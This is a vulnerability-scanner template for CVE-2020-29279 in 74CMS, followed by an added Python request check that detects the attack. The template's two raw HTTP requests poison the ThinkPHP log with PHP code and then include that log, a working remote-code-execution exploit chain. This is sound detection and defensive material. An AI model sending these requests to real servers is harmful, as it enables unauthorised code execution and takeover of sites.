Vulnerability description
PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.
id: CVE-2020-29279

info:
  name: 74CMS - Remote File Inclusion
  author: DhiyaneshDK
  severity: critical
  description: |
    PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 6.0.48 or later.
  reference:
    - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/74cms/74cms%20v6.0.48%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5%2B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABgetshell.md
    - https://www.wangan.com/p/7fyg8ka5a6f81cb6
    - https://cloud.tencent.com/developer/article/1856739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29279
    epss-score: 0.45342
    epss-percentile: 0.97452
    cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: 74cms
    product: 74cms
    fofa-query: app="骑士-74CMS"
  tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=<?php phpinfo(); echo md5("{{num}}");ob_flush();?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "ThinkPHP")'
        condition: and
        internal: true

  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=data/Runtime/Logs/Home/{{replace(date_time("%Y"), "20", "")}}_{{date_time("%M_%D",unix_time())}}.log

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Version"
          - "{{md5(num)}}"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022039513e469b726d5d704c3afe56ee46430863e071547f65575f81a4b8e6c7adc502202532c7421b450c9c97700d586f2203e8343b2dd5a631016cdcf739359e69a941:922c64590222798bb761d5b6d8e72950
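The template above works in two stages: first it gets PHP tags written into the ThinkPHP runtime log by passing them as the `tpl` parameter, then it includes that log file. As an added example (not part of the template or of 74CMS), here is a request-inspection check a defender could put behind a WAF rule or run over replayed request logs; it flags both stages. The parameter names and the log path come from the template; the function names, the finding labels and the sample dates are this example's own assumptions.

```python
"""Defensive request check for CVE-2020-29279 (added example, not 74CMS code).

Flags requests to the 74CMS `assign_resume_tpl` action whose `tpl` value
carries PHP tags (log-poisoning stage) or names a file such as a ThinkPHP
runtime log instead of a plain template (inclusion stage).
"""
import re
from urllib.parse import unquote_plus, urlsplit

PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)
# Traversal, absolute path, stream wrapper, .log file or the runtime log dir:
# none of these belong in a template name (assumed shape of a benign value).
BAD_PATH = re.compile(r"(\.\./|^/|^[a-z0-9+.-]+:|\.log\b|runtime/logs)", re.IGNORECASE)


def parse_form(raw):
    """Split x-www-form-urlencoded data on '&' only, so the ';' inside a PHP
    payload can never break the value apart (parse_qs did that on old Pythons)."""
    params = {}
    for pair in raw.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def classify_request(url, body=""):
    """Return finding labels for one request; an empty list means nothing suspicious."""
    parts = urlsplit(url)
    params = parse_form(parts.query)
    params.update(parse_form(body))  # POST body overrides the query string
    if not parts.path.endswith("/index.php"):
        return []
    if params.get("m") != "home" or params.get("a") != "assign_resume_tpl":
        return []
    tpl = params.get("tpl", "")
    findings = []
    if PHP_TAG.search(tpl):
        findings.append("php-code-in-tpl")            # stage 1: poisoning the log
    if BAD_PATH.search(tpl):
        findings.append("tpl-outside-template-dir")   # stage 2: including that file
    return findings


# Constructed sample requests mirroring the two stages of the template
URL = "/index.php?m=home&a=assign_resume_tpl"
POISON = 'variable=1&tpl=<?php phpinfo(); echo md5("999999999");ob_flush();?>'
INCLUDE = "variable=1&tpl=data/Runtime/Logs/Home/20_05_13.log"
```

Running `classify_request(URL, POISON)` and `classify_request(URL, INCLUDE)` yields one finding each, while a plain `tpl=default` request yields none.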